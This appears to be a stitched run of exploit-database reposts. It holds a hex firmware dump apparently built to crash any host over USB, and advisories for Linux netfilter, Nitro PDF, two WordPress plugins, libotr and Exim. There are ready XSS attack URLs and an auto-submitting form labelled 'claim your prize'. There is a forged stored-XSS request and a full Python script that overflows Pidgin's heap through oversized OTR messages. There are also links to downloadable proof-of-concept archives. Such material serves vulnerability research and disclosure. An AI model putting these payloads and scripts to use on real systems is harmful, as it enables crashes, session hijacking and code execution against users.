:101310004052419302D0A9F7EACFB4E0A695979541
:10132000879577956795BA95C9F700976105710517
:1013300008959B01AC010A2E069457954795379561
:101340002795BA95C9F7620F731F841F951FA01DBB
:101350000895EE0FFF1F0590F491E02D09942F9250
:101360003F924F925F926F927F928F929F92AF9235
:10137000BF92CF92DF92EF92FF920F931F93CF9382
:10138000DF93CDB7DEB7CA1BDB0B0FB6F894DEBF19
:101390000FBECDBF09942A88398848885F846E843F
:1013A0007D848C849B84AA84B984C884DF80EE8089
:1013B000FD800C811B81AA81B981CE0FD11D0FB692
:1013C000F894DEBF0FBECDBFED010895F894FFCFB6
:1013D0001201000200000040AD0BEFBE000101024F
:1013E000000122034200610064002000420041002D
:1013F00042004500250078002500780025006E0099
:101400002500700018034200410044002000430002
:101410003000460046004500450021001201000250
:1014200000000040580403500001010203010902BA
:10143000270001010000FA0705810304040C0705D9
:10144000010204000C0705820104000C07000700DC
:101450000700480100500072006F006C00690066D0
:101460000069006300000A550000006BFD180A00C7
:10147000809F0AB901312B940A8101128946001319
:10148000000257028B0A5E0AF80A5F01F21201009D
:1014900002010000400D055702000101020301B9DD
:1014A0000A0100F80A5F0A810A220342006100640F
:1014B0000020004200410042004500250078002540
:1014C00000780025006E00250070001803420041DE
:1014D000004400200043003000460046004500451F
:1014E00000210012010002010000400D055702001A
:1014F000010102030109040000030100000003F2DE
:101500000AEC0A0902270001010000FA01AB0A09EE
:101510000400000301000000090200202020202018
:101520005F5F5F5F5F5F5F5F2020202020202020C3
:1015300020202020202020202020202020202020AB
:1015400020205F5F5F5F5F205F5F20205F202020A3
:101550002020205F5F0A0D00202020202F205F5FC9
:101560005F5F2F202F5F20205F5F5F5F205F5F5FE7
:101570005F5F20205F5F5F5F5F20202020202F20A3
:101580005F5F5F2F2F202F5F285F295F5F5F5F2FD7
:10159000202F5F5F0A0D002020202F202F202020E9
:1015A0002F205F5F205C2F205F5F20602F205F5F18
:1015B000205C2F205F5F5F2F5F5F5F5F205C5F5F5E
:1015C000205C2F205F5F2F202F205F5F5F2F202F59
:1015D0002F5F2F0A0D0020202F202F5F5F5F2F200D
:1015E0002F202F202F202F5F2F202F202F5F2F2005
:1015F000285F5F2020292F5F5F5F2F205F5F2F20F4
:101600002F202F5F2F202F202F5F5F2F202C3C0AB1
:101610000D0020205C5F5F5F5F2F5F2F202F5F2F0B
:101620005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F63
:101630002F20202020202F5F5F5F5F2F5C5F5F2FB8
:101640005F2F5C5F5F5F2F5F2F7C5F7C0A0D002048
:101650003C3C2043485241534820414E59204F5072
:1016600045524154494E472053595354454D203E0D
:101670003E0A0D00203C3C202863292053657267F8
:10168000656A20536368756D696C6F20323031353F
:101690002C204F70656E536F7572636520536563C0
:1016A00075726974792052616C66205370656E6E34
:1016B0006562657267203E3E0A0D000A3E3E20507C
:1016C0007265737320627574746F6E20746F20730B
:1016D0007461727420657865637574696F6E2E2EFF
:1016E0002E0A0D005B44454255475D2045786563F1
:1016F000757465207061796C6F616420300A0D002B
:10170000526563762D446174613A0A0D005B44456D
:101710004255475D200953656E6420436F6E6669CC
:101720006775726174696F6E446573637269707412
:101730006F720928696E6465783A2569292E2E2E04
:101740000D0A005B44454255475D200953656E64B0
:1017500020496E74657266616365204465736372C7
:101760006970746F720928696E7465726661636569
:101770003A2569292E2E2E0D0A005B444542554715
:101780005D200953656E6420456E64706F696E74E8
:101790002044657363726970746F720928656E64A2
:1017A000706F696E743A2569292E2E2E0D0A005B22
:1017B00044454255475D203C3C70616E6963206D35
:1017C0006F64653F3E3E0D0A005B44454255475DF0
:1017D0002009203E3E20537472696E672044657371
:1017E00063726970746F72207265717565737420AD
:1017F0002D2073656E64696E67206D616C666F7213
:101800006D656420737472696E67212073657475E9
:10181000702E7756616C75654C203D3D2025690D15
:101820000A005B48455844554D505D0A0D0025306F
:04183000325820000A
:00000001FF
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=758

A memory corruption vulnerability exists in the IPT_SO_SET_REPLACE ioctl in the netfilter code for iptables support. This ioctl is can be triggered by an unprivileged user on PF_INET sockets when unprivileged user namespaces are available (CONFIG_USER_NS=y). Android does not enable this option, but desktop/server distributions and Chrome OS will commonly enable this to allow for containers support or sandboxing.

In the mark_source_chains function (net/ipv4/netfilter/ip_tables.c) it is possible for a user-supplied ipt_entry structure to have a large next_offset field. This field is not bounds checked prior to writing a counter value at the supplied offset:

newpos = pos + e->next_offset;
...
e = (struct ipt_entry *) (entry0 + newpos);
e->counters.pcnt = pos;

This means that an out of bounds 32-bit write can occur in a 64kb range from the allocated heap entry, with a controlled offset and a partially controlled write value ("pos") or zero. The attached proof-of-concept (netfilter_setsockopt_v3.c) triggers the corruption multiple times to set adjacent heap structures to zero. 

This issue affects (at least) kernel versions 3.10, 3.18 and 4.4. It appears that a similar codepath is accessible via arp_tables.c/ARPT_SO_SET_REPLACE as well.

Furthermore, a recent refactoring cof this codepath (https://github.com/torvalds/linux/commit/2e4e6a17af35be359cc8f1c924f8f198fbd478cc) introduced an integer overflow in xt_alloc_table_info, which on 32-bit systems can lead to small structure allocation and a copy_from_user based heap corruption. The attached proof-of-concept (netfilter_setsockopt_v4.c) triggers this issue on 4.4.

Correction: IPT_SO_SET_REPLACE is reached via setsockopt, not ioctl!


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39545.zip
HireHackking 
#####################################################################################

Application: Nitro PDF

Platforms: Windows

Versions: Nitro Pro 10.5.7.32 and lower  & Nitro Reader 5.5.3.1 and lower

Author: Francis Provencher of COSIG

Website: http://www.protekresearchlab.com/

Twitter: @COSIG_ @protekresearch

#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) POC

#####################################################################################

===============
1) Introduction
===============

Nitro develops commercial software used to create, edit, sign, and secure Portable Document Format (PDF) files and digital documents. The Nitro ecosystem consists of Nitro Pro, Nitro Cloud, Nitro Reader, and a suite of document conversion sites.

Nitro’s product family is intended for the professional market and although its desktop products are Windows-only, Nitro Cloud is compatible with any web browser on any machine. The Nitro PDF Reader is freeware for both personal and professional use.

(https://en.wikipedia.org/wiki/Nitro_PDF)

#####################################################################################

============================
2) Report Timeline
============================

2015-12-29: Francis Provencher from COSIG report issue to GoNitro sales team;
2016-01-02: GoNitro confirmed this issue;
2016-01-21: GoNitro fixed this issue;

https://www.gonitro.com/support/security-update
#####################################################################################

============================
3) Technical details
============================

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Nitro PDF 10 (10.5.7.32).
User interaction is required to exploit this vulnerability in that the target must open a malicious file.

A specially crafted PDF with a specific FunctionType 0 and an invalid /Domain can force an heap memory corruption

by pointing to an uninitialized space of memory.An attacker can leverage this vulnerability to execute arbitrary code under the context of the current process.1

.

#####################################################################################

===========

4) POC

===========

http://protekresearchlab.com/exploits/COSIG-2016-13.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39546.zip

###############################################################################
HireHackking 
* Exploit Title: BWS Captcha Multiple Vulnerabilities
* Discovery Date:12.03.2015
* Public Disclosure Date:03.10.2016
* Exploit Author: Colette Chamberland
* Contact: colette@wordfence.com
* Vendor Homepage: http://bestwebsoft.com/
* Software Link: https://wordpress.org/plugins/captcha/
* Version:  <=4.1.5
* Tested on: Wordpress 4.2.x
* Category: Wordpress
* CVE: Requested but none received
 
Description
================================================================================
Unsanitized input in whitelist.php:

297: $message = __( 'Search results for', $this->textdomain ) . '&nbsp;:&nbsp;' . $_REQUEST['s'];

 
PoC
================================================================================
The variable can be passed in using a get as well as a post. An attacker
could send unsuspecting authenticated admin a url crafted like such:

http://wwww.victim.com/wp-admin/admin.php?page=captcha.php&action=whitelist&s=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E

or they can send a form (no CSRF token check)

<form method="post" action="http://victim.com/wp-admin/admin.php?page=captcha.php&action=whitelist">
<input type="hidden" name="s" value="<script>alert(1);</script>">
<input type="submit" name="Search IP" value="Click here to claim your prize!">
</form>

and it would execute XSS as long as they were logged in to the site.
HireHackking 
1. Introduction


# Exploit Title: WordPress WP Advanced Comment 0.10 Persistent XSS 
# Date: Mar.09.2016 
# Exploit Author: Mohammad Khaleghi 
# Contact: https://twitter.com/_blackmatrix 
# Vendor: Ravi Shakya 
# Tested On: Apache2.2 / PHP5 / Kali 64 / WordPress 4.4.1 
# Category: Webapps 
# Software Link: https://wordpress.org/support/plugin/wp-advance-comment 



2. Description

WP Advanced Comment 0.10 plugin does not have XSS protection, which means that an attacker can change the POST request , value of " name="comment[meta_value]" " parameter , it's not escaped . XSS is visible for admin

File : wp-content\plugins\wp-advance-comment\shortcodes\comment-form.php


<!-- Show Comments -->

<?php

	if( $option[$id]['other']['comment_position'] == 1 ){

		echo $this->show_like_dislike_button( $value['comment_ID'] , 
		$option[$id]['other'] , 'top' );

		echo '<p>'.$value['comment_content'].'</p>';

		echo $this->show_like_dislike_button( $value['comment_ID'] , 
		$option[$id]['other'] , 'bottom' );

}?>

<!-- Get the comment meta --> 	

<?php

	$data = get_option( 'wpad_comment_form' );

	if( !empty( $data[$id] ) ): 
?>

<div class="wpad_comment_meta">
	 <ul>
	  <?php
	  foreach( $data[$id] as $key => $value1 ){
	  $show_admin = isset($value1['show_admin']) ? 
	  $value1['show_admin'] : 0; $privelage = $this->check_administrator( $show_admin );
 
     	  if ( !empty( $value1['meta_key'] ) && is_numeric( $key ) && $value1['meta_key'] != 'user_name' && $value1
 	       ['meta_key'] != 'user_email' && $value1['custom_field'] != 'user_image' && 
	       $value1['meta_key'] != 'wpad_comment' && $privelage == true )  {

	       $meta_key = $value1['meta_key'];
	       $label = $value1['label'];

	       $meta_value = get_comment_meta( $value['comment_ID'] , 
	       $meta_key , true ); if( !empty( $meta_value ) ) {

		if( $value1['custom_field'] == 'radio' ) {

			$radio_value = $this->get_corresponding_metakey( $value1 , $meta_value , 'radio' ); 
			$this->display_comment_metas_frontend( $label , $radio_value );
			} 
			elseif ( $value1['custom_field'] == 'checkbox' ) {

			   $check_value = $this->get_corresponding_metakey( $value1 , $meta_value , 'checkbox');	
			   $this->display_comment_metas_frontend( $label , $check_value ); } 
			else {
   			    $this->display_comment_metas_frontend( $label , $meta_value );
		  	       }

			}
		}
	}

	?>
	</ul>
            </div>

<?php endif; ?>

<!-- Show Comments -->
 

3. Proof of Concept

Request :
__________________________________________________________________________

Host=127.0.0.1:8080
User-Agent=Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept=*/*
X-Requested-With=XMLHttpRequest
Referer=http://127.0.0.1:8080/wordpress/2016/02/02/hello-world/
Content-Length=1399
Content-Type=multipart/form-data;
boundary=---------------------------23741051518289624461916684164

Cookie=wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=bourne %7C1455436892%7CVRgNbhd39pxXUlNXcCTkDnTbZTCudBIJlfSocx8yFWh %7C5a52d446b3c1782856a5021a38e5b1431297eca6fa81946694ebfdf305 994a84; wordpress_72672e10a1f0c9288ac55a4f4fc9805d=bourne %7C1455962074%7C0QblET9IPqz4apEnQsVq0WOUr7oY1EU25wIcKVKF4sY %7Cfeedc6beb6fc4d7fc7719fd1e45666b270f598a8294df146742750fd43 2ca5b3; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=bourne %7C1455436892%7CVRgNbhd39pxXUlNXcCTkDnTbZTCudBIJlfSocx8yFWh %7C80f4e9b382b8b316ba8967a1651ea91cecc45300c13c754f528a17ade8 475032; wp-settings-time-1=1454782581; wp-settings-time-2=1454752438; wordpress_logged_in_72672e10a1f0c9288ac55a4f4fc9805d=bourne %7C1455962074%7C0QblET9IPqz4apEnQsVq0WOUr7oY1EU25wIcKVKF4sY %7C8ff14befe34a2a5f1c4c6d93123e6afce4af2c43272a0351f2ce9b1499 1c180f; wordpress_test_cookie=WP+Cookie+check

Connection=keep-alive
Pragma=no-cache
Cache-Control=no-cache

POSTDATA =-----------------------------23741051518289624461916684164

Content-Disposition: form-data; name="action"

wpad_save_comment

-----------------------------

23741051518289624461916684164 Content-Disposition: form-data; name="post_id"
 

1

-----------------------------

23741051518289624461916684164 Content-Disposition: form-data; name="form_id"

417

-----------------------------
23741051518289624461916684164 Content-Disposition: form-data; name="email_me_on_approve"

undefined

-----------------------------
23741051518289624461916684164 Content-Disposition: form-data; name="user_name[meta_value]"

bourne

-----------------------------
23741051518289624461916684164 Content-Disposition: form-data; name="user_name[meta_key]"

user_name

-----------------------------
23741051518289624461916684164 Content-Disposition: form-data; name="user_email[meta_value]"

jason_bourne110@yahoo.com

-----------------------------

23741051518289624461916684164 Content-Disposition: form-data; name="user_email[meta_key]"

user_email

-----------------------------

23741051518289624461916684164 Content-Disposition: form-data; name="comment[meta_value]"

Hack <script>alert("Hacked")</script>

-----------------------------
23741051518289624461916684164 Content-Disposition: form-data; name="comment[meta_key]"

comment

-----------------------------
23741051518289624461916684164--
 

Response
______________________________________________________________________

Status=OK - 200
Date=Sat, 06 Feb 2016 18:18:43 GMT 
Server=Apache X-Frame-Options=SAMEORIGIN, SAMEORIGIN X-Powered-By=PHP/5.5.29 X-Robots-Tag=noindex x-content-type-options=nosniff Expires=Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control=no-cache, must-revalidate, max-age=0 Pragma=no-cache
Content-Length=7 
Keep-Alive=timeout=5, max=100 
Connection=Keep-Alive 
Content-Type=text/html; charset=UTF-8



4. Report Timeline

09-03-2016 : Discovered
09-03-2016 : Vendor notified
09-03-2016 : Vendor Responded 
09-03-2016 : Vendor fixed the problem


5. Solution

Update to version 0.11
HireHackking 
'''
X41 D-Sec GmbH Security Advisory: X41-2016-001

Memory Corruption Vulnerability in "libotr"
===========================================

Overview
--------
Severity Rating: high
Confirmed Affected Version: 4.1.0 and below
Confirmed Patched Version: libotr 4.1.1
Vendor: OTR Development Team
Vendor URL: https://otr.cypherpunks.ca
Vendor Reference: OTR Security Advisory 2016-01
Vector: Remote
Credit: X41 D-Sec GmbH, Markus Vervier
Status: public
CVE: CVE-2016-2851
CVSS Score: 8.1 (High)
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2016-001-libotr/

Summary and Impact
------------------
A remote attacker may crash or execute arbitrary code in libotr by
sending large OTR messages.
While processing specially crafted messages, attacker controlled data on
the heap is written out of bounds.
No special user interaction or authorization is necessary in default
configurations.

Product Description
-------------------
Off-the-Record (OTR) Messaging is a cryptographic protocol used in
well-known instant messaging clients such as Pidgin, ChatSecure, Adium
and others. It is designed to work on top of existing protocols and used
worldwide to provide secure communication in insecure environments.
OTR is regarded as highly secure and according to documents revealed by
Edward Snowden one of the protocols that the NSA is not able to decrypt
via cryptanalysis.
The most commonly used implementation of OTR is "libotr" which is a pure
C code implementation of the OTR protocol.

Analysis
--------
During a manual code review X41 D-Sec GmbH discovered a remotely
exploitable vulnerability in libotr.

By sending large messages, an integer overflow can be triggered which
subsequently leads to a heap overflow on 64 bit architectures.

When a message of type OTRL_MSGSTATE_DATA is received during an
established OTR conversation, this message is passed to function
otrl_proto_accept_data in src/message.c line 1347:

	case OTRL_MSGSTATE_ENCRYPTED:
		extrakey = gcry_malloc_secure(OTRL_EXTRAKEY_BYTES);
		err = otrl_proto_accept_data(&plaintext, &tlvs, context,
		                  message, &flags, extrakey);

After base64 decoding the message and reading various values from it,
the length of a payload is read into a variable of type "unsigned int"
in file proto.c line 784:

	read_int(datalen);

It is checked that the message buffer will contain at least a "datalen"
number of bytes using read_int in proto.c line 785:

	require_len(datalen);

The macros "read_int" and "required_len" are defined in src/serial.h:

	#define require_len(l) do { \
		if (lenp < (l)) goto invval; \
	    } while(0)

	#define read_int(x) do { \
		require_len(4); \
		(x) = (((unsigned int)bufp[0]) << 24) | (bufp[1] << 16) | (bufp[2] <<
8) | bufp[3]; \
		bufp += 4; lenp -= 4; \
	    } while(0)

4 bytes are read from the message buffer and interpreted as unsigned int
value.

Subsequently a buffer of size datalen+1 is allocated using malloc
in proto.c line 786:

    data = malloc(datalen+1);
    if (!data) {
        err = gcry_error(GPG_ERR_ENOMEM);
        goto err;
    }

Now data from the message is copied into this buffer using memmove in
line 791:

    memmove(data, bufp, datalen);

The vulnerability is triggered if a value of 0xFFFFFFFF (MAX_UINT) is
read from the message buffer. As datalen is of size 32-bit (unsigned
int) the operation "datalen+1" will wrap around before being passed to
malloc.
This will effectively result in a zero allocation ( malloc(0) ) which is
valid in common implementations of malloc on the x86_64 architecture.
As no addition is done in the value passed to the call to memmove, 4
gigabytes of data are copied out of bounds to the heap location pointed
to by data.

Proof of Concept
----------------
In order to successfully trigger the vulnerability, an attacker must be
able to send a data message of more than 5.5 gigabytes to a victim in
order to pass the check "require_len(datalen)".
Due to the support of fragmented OTR messages assembled by libotr this
is possible in practice. By sending 275 messages of size 20MB each, X41
was able to make libotr process such a data message successfully on a
system with 8GB of ram and 15GB of swap space.
As data types for lenp and other lengths of the message are 64 bit large
size_t types on x86_64 architectures huge messages of multiple gigabytes
are possible.
Sending such a message to a pidgin client took only a few minutes on a
fast network connection without visible signs of any attack to a user.

A proof of concept triggering a heap overwrite and crash in the
pidgin-otr plugin for the popular pidgin messenger on x86_64 Linux
architectures is available[1].

The crash occurs due to the overwrite hitting unmapped memory. Using
techniques such as heap grooming, X41 was able to inflate the heap to
more than 4GB and overwrite function pointers and arguments on the heap
in order to take over control flow. A working exploit will not be
published at this time.

Interaction by users beyond having enabled OTR is not necessary as OTR
sessions are automatically established with anyone by default in Pidgin
and other common software using libotr. This also applies to
unauthorized contacts in most default configurations.

Workarounds
-----------
As a temporary workaround on Linux and BSD systems, the amount of memory
available to the process running libotr may be limited to less than 4GB
via ulimit.

About X41 D-Sec GmbH
--------------------
X41 D-Sec is a provider of application security services. We focus
on application code reviews, design review and security testing. X41
D-Sec GmbH was founded in 2015 by Markus Vervier. We support customers
in various industries such as finance, software development and public
institutions.

Timeline
--------
2016-02-17	Discovery during a manual code review of "libotr" version 4.1.0
2016-02-17	Initial PoC
2016-02-18	Vendor contacted
2016-02-18	Vulnerability confirmed by vendor
2016-03-03	Vendor patch available
2016-03-04	CVE requested
2016-03-06	CVE-2016-2851 assigned
2016-03-09	Embargo lifted and disclosure

References
----------
[1]
https://www.x41-dsec.de/lab/advisories/x41-2016-001-libotr/otr-heap-overwrite-poc.py
'''

#!/usr/bin/python -u
#
### PoC libotr heap overwrite on Pidgin
### 2016-02-17 Markus Vervier
### X41 D-Sec GmbH

### initial code taken from pyxmpp examples (echobot.py)

### PoC was tested using a standard Prosody XMPP-Server on Arch-Linux allowing 20MB sized messages by default (and even larger)

### On a loopback interface the exploit took several minutes,
### using XMPP stream compression this could be reduced massively

### pyxmpp does not support it
### We used XMPP connections without TLS to not further complicate the setup

### USAGE
### 
### Prerequisite: 2 Jabber Accounts (attacker, victim), set Ressource of attacker to "attacktest"

### 1. Initiate an encrypted session from attacker-account to victim-account (e.g. using pidgin)
### 2. Disconnect the attacker account
### 3. Fire up this script and let it connect with the attacker account credentials
### 4. Send a message from victim to attacker
### 5. Wait until message sending is complete, pidgin should crash

### !!! Steps 2-5 (and especially user interaction) are only necessary for this PoC
### !!! If we would implement full OTR in this script we could send the bad message directly
### !!! For easier PoC we now wait until an encrypted message is received to get the correct instance tags

import sys
import logging
import locale
import codecs
import os, signal
import time
import base64

def ignore_signal_pipe(signum, frame):
    print 'signal pipe caught -- IGNORING'

signal.signal(signal.SIGPIPE, ignore_signal_pipe)

from struct import *
from pyxmpp.all import JID,Iq,Presence,Message,StreamError
from pyxmpp.jabber.client import JabberClient
from pyxmpp.interface import implements
from pyxmpp.interfaces import *
from pyxmpp.streamtls import TLSSettings
from enum import Enum

class EchoHandler(object):
    """Provides the actual 'echo' functionality.

    Handlers for presence and message stanzas are implemented here.
    """

    implements(IMessageHandlersProvider, IPresenceHandlersProvider)
    
    def __init__(self, client):
        """Just remember who created this."""
        self.client = client

    def get_message_handlers(self):
        """Return list of (message_type, message_handler) tuples.

        The handlers returned will be called when matching message is received
        in a client session."""
        return [
            ("normal", self.message),
            ]

    def get_presence_handlers(self):
        """Return list of (presence_type, presence_handler) tuples.

        The handlers returned will be called when matching presence stanza is
        received in a client session."""
        return [
            (None, self.presence),
            ("unavailable", self.presence),
            ("subscribe", self.presence_control),
            ("subscribed", self.presence_control),
            ("unsubscribe", self.presence_control),
            ("unsubscribed", self.presence_control),
            ]

    def message(self,stanza):
        """Message handler for the component.

        Echoes the message back if its type is not 'error' or
        'headline', also sets own presence status to the message body. Please
        note that all message types but 'error' will be passed to the handler
        for 'normal' message unless some dedicated handler process them.

        :returns: `True` to indicate, that the stanza should not be processed
        any further."""
        subject=stanza.get_subject()
        body=stanza.get_body()
        t=stanza.get_type()
        m = 0 
        print u'Message from %s received.' % (unicode(stanza.get_from(),)),
        if subject:
            print u'Subject: "%s".' % (subject,),
        if body:
            print u'Body: "%s".' % (body,),
        if t:
            print u'Type: "%s".' % (t,)
        else:
            print u'Type: "normal".'
        if stanza.get_type()=="headline":
            # 'headline' messages should never be replied to
            return True
        # record instance tag
        if body[:9] == u'?OTR:AAMD':
            (self.instance_tag, self.our_tag) = self.parse_aamc(body[len("?OTR:AAMD"):])
            print "parsed instance tag: %s and our tag %s" % (self.instance_tag.encode("hex"), self.our_tag.encode("hex") )
            self.send_insane_otr(stanza, 1024*1024*20, self.instance_tag, self.our_tag)
        
        return m

    def b64maxlen(self, chars):
        return 1 + (4 * chars / 3)

    def parse_aamc(self, msg):
        maxlen = self.b64maxlen(8) # 4 byte integer
        print "maxlen %u" % (maxlen)
        tmp = msg[0:maxlen]
        padding = ""
        if maxlen % 4 > 1:
            padding = "="*(4-(maxlen % 4))
        tmp += padding
        print "decoding: "+tmp
        packed = base64.b64decode(tmp)
#        return unpack("I", packed[0:4])
        return (packed[0:4], packed[4:8]) # their tag, our tag

    def initial_body(self, instance_tag, our_tag):
        ret = "?OTR:AAMD";
        raw = b''
        print "packing initial block with instance tag: %s and our tag: %s" % (instance_tag.encode("hex"), our_tag.encode("hex"))
        #dirty hack
        raw += our_tag # sender_nstance_id
        raw += instance_tag # receiver_id
        raw += "D" # dummy flags
        raw += pack("I", 0x1) # sender key id
        raw += pack("I", 0x2) # recipient key id
        raw += pack("!I", 10) # len next_y
	raw += "B"*10 # next_y # we don't know how mpi works but it seems ok ;)
        raw += "12345678" # reveal sig dummy
        # yeah overflow!
        raw += pack("I", 0xFFFFFFFF); # datalen

        ret += base64.b64encode(raw+"A"*(57-len(raw)))
        return ret

    def send_insane_otr(self, stanza, frag_size, instance_tag, our_tag):
        print "G-FUNK!"

        # this should result in about 0xFFFFFFFF times "A" base64 encoded        
        len_msg = 5726623060
        # fix frag size for base64
        frag_size = (frag_size / 4) * 4

        frag_msg = "QUFB"*(frag_size / 4)

        n = len_msg / frag_size 
        # does not evenly divide?
        if len_msg % frag_size > 0:
            n += 1
        k = 1
        n += 1 # initialbody adds another frame
        initialbody = "?OTR,%hu,%hu,%s," % (k , n , self.initial_body(instance_tag, our_tag))
        print "first fragment: "+initialbody
        m = Message(
                to_jid=stanza.get_from(),
                from_jid=stanza.get_to(),
                stanza_type=stanza.get_type(),
                subject="foo",
                body=initialbody)
        self.client.stream.send(m)
        k += 1
        print "frag size: %s, len_msg: %u, num_frags: %u" % (frag_size, len_msg, n)
        cur_pos = 0
        while(cur_pos < len_msg):
            body = "?OTR,%hu,%hu,%s," % (k , n , frag_msg)
            m = Message(
                to_jid=stanza.get_from(),
                from_jid=stanza.get_to(),
                stanza_type=stanza.get_type(),
                subject="foo",
                body=body)
            print "cur_pos %u of %u" % (cur_pos, len_msg)
            self.client.stream.send(m)
            k += 1
            cur_pos = frag_size * (k-2)
            time.sleep(0.9)
        print "FINAL FRAG: cur_pos %u of %u" % (cur_pos, len_msg)

 
    def presence(self,stanza):
        """Handle 'available' (without 'type') and 'unavailable' <presence/>."""
        msg=u"%s has become " % (stanza.get_from())
        t=stanza.get_type()
        if t=="unavailable":
            msg+=u"unavailable"
        else:
            msg+=u"available"

        show=stanza.get_show()
        if show:
            msg+=u"(%s)" % (show,)

        status=stanza.get_status()
        if status:
            msg+=u": "+status
        print msg

    def presence_control(self,stanza):
        """Handle subscription control <presence/> stanzas -- acknowledge
        them."""
        msg=unicode(stanza.get_from())
        t=stanza.get_type()
        if t=="subscribe":
            msg+=u" has requested presence subscription."
        elif t=="subscribed":
            msg+=u" has accepted our presence subscription request."
        elif t=="unsubscribe":
            msg+=u" has canceled his subscription of our."
        elif t=="unsubscribed":
            msg+=u" has canceled our subscription of his presence."

        print msg

        return stanza.make_accept_response()


class VersionHandler(object):
    """Provides handler for a version query.
    
    This class will answer version query and announce 'jabber:iq:version' namespace
    in the client's disco#info results."""
    
    implements(IIqHandlersProvider, IFeaturesProvider)

    def __init__(self, client):
        """Just remember who created this."""
        self.client = client

    def get_features(self):
        """Return namespace which should the client include in its reply to a
        disco#info query."""
        return ["jabber:iq:version"]

    def get_iq_get_handlers(self):
        """Return list of tuples (element_name, namespace, handler) describing
        handlers of <iq type='get'/> stanzas"""
        return [
            ("query", "jabber:iq:version", self.get_version),
            ]

    def get_iq_set_handlers(self):
        """Return empty list, as this class provides no <iq type='set'/> stanza handler."""
        return []

    def get_version(self,iq):
        """Handler for jabber:iq:version queries.

        jabber:iq:version queries are not supported directly by PyXMPP, so the
        XML node is accessed directly through the libxml2 API.  This should be
        used very carefully!"""
        iq=iq.make_result_response()
        q=iq.new_query("jabber:iq:version")
        q.newTextChild(q.ns(),"name","Echo component")
        q.newTextChild(q.ns(),"version","1.0")
        return iq

class Client(JabberClient):
    """Simple bot (client) example. Uses `pyxmpp.jabber.client.JabberClient`
    class as base. That class provides basic stream setup (including
    authentication) and Service Discovery server. It also does server address
    and port discovery based on the JID provided."""

    def __init__(self, jid, password, tls_cacerts):
        # if bare JID is provided add a resource -- it is required
        if not jid.resource:
            jid=JID(jid.node, jid.domain, "attacktest")

        if tls_cacerts:
            if tls_cacerts == 'tls_noverify':
                tls_settings = TLSSettings(require = True, verify_peer = False)
            else:
                tls_settings = TLSSettings(require = True, cacert_file = tls_cacerts)
        else:
            tls_settings = None

        # setup client with provided connection information
        # and identity data
        JabberClient.__init__(self, jid, password,
                disco_name="PyXMPP example: echo bot", disco_type="bot",
                tls_settings = tls_settings)

        # add the separate components
        self.interface_providers = [
            VersionHandler(self),
            EchoHandler(self),
            ]

    def stream_state_changed(self,state,arg):
        """This one is called when the state of stream connecting the component
        to a server changes. This will usually be used to let the user
        know what is going on."""
        print "*** State changed: %s %r ***" % (state,arg)

    def print_roster_item(self,item):
        if item.name:
            name=item.name
        else:
            name=u""
        print (u'%s "%s" subscription=%s groups=%s'
                % (unicode(item.jid), name, item.subscription,
                    u",".join(item.groups)) )

    def roster_updated(self,item=None):
        if not item:
            print u"My roster:"
            for item in self.roster.get_items():
                self.print_roster_item(item)
            return
        print u"Roster item updated:"
        self.print_roster_item(item)

# XMPP protocol is Unicode-based to properly display data received
# _must_ convert it to local encoding or UnicodeException may be raised
locale.setlocale(locale.LC_CTYPE, "")
encoding = locale.getlocale()[1]
if not encoding:
    encoding = "us-ascii"
sys.stdout = codecs.getwriter(encoding)(sys.stdout, errors = "replace")
sys.stderr = codecs.getwriter(encoding)(sys.stderr, errors = "replace")


# PyXMPP uses `logging` module for its debug output
# applications should set it up as needed
logger = logging.getLogger()
logger.addHandler(logging.StreamHandler())
logger.setLevel(logging.INFO) # change to DEBUG for higher verbosity

if len(sys.argv) < 3:
    print u"Usage:"
    print "\t%s JID password ['tls_noverify'|cacert_file]" % (sys.argv[0],)
    print "example:"
    print "\t%s test@localhost verysecret" % (sys.argv[0],)
    sys.exit(1)

print u"creating client..."

c=Client(JID(sys.argv[1]), sys.argv[2], sys.argv[3] if len(sys.argv) > 3 else None)

print u"connecting..."
c.connect()

print u"looping..."
try:
    # Component class provides basic "main loop" for the applitation
    # Though, most applications would need to have their own loop and call
    # component.stream.loop_iter() from it whenever an event on
    # component.stream.fileno() occurs.
    c.loop(1)
except IOError, e:
    if e.errno == errno.EPIPE:
    # IGNORE EPIPE error
        print "PIPE ERROR -- IGNORING"
    else:
        pass


except KeyboardInterrupt:
    print u"disconnecting..."
    c.disconnect()

print u"exiting..."
# vi: sts=4 et sw=4
HireHackking 
=============================================
- Advisory release date: 10.03.2016
- Created by: Dawid Golunski
- Severity: High/Critical
=============================================


I. VULNERABILITY
-------------------------

Exim < 4.86.2        Local Root Privilege Escalation Exploit


II. BACKGROUND
-------------------------

"Exim is a message transfer agent (MTA) developed at the University of 
Cambridge for use on Unix systems connected to the Internet. It is freely 
available under the terms of the GNU General Public Licence. In style it is 
similar to Smail 3, but its facilities are more general. There is a great 
deal of flexibility in the way mail can be routed, and there are extensive 
facilities for checking incoming mail. Exim can be installed in place of 
Sendmail, although the configuration of Exim is quite different."

http://www.exim.org/


III. INTRODUCTION
-------------------------

When Exim installation has been compiled with Perl support and contains a 
perl_startup configuration variable it can be exploited by malicious local 
attackers to gain root privileges.

IV. DESCRIPTION
-------------------------

The vulnerability stems from Exim in versions below 4.86.2 not performing 
sanitization of the environment before loading a perl script defined
with perl_startup setting in exim config.

perl_startup is usually used to load various helper scripts such as
mail filters, gray listing scripts, mail virus scanners etc.

For the option to be supported, exim must have been compiled with Perl 
support, which can be verified with:

[dawid@centos7 ~]$ exim -bV -v | grep i Perl
Support for: crypteq iconv() IPv6 PAM Perl Expand_dlfunc TCPwrappers OpenSSL
Content_Scanning DKIM Old_Demime PRDR OCSP


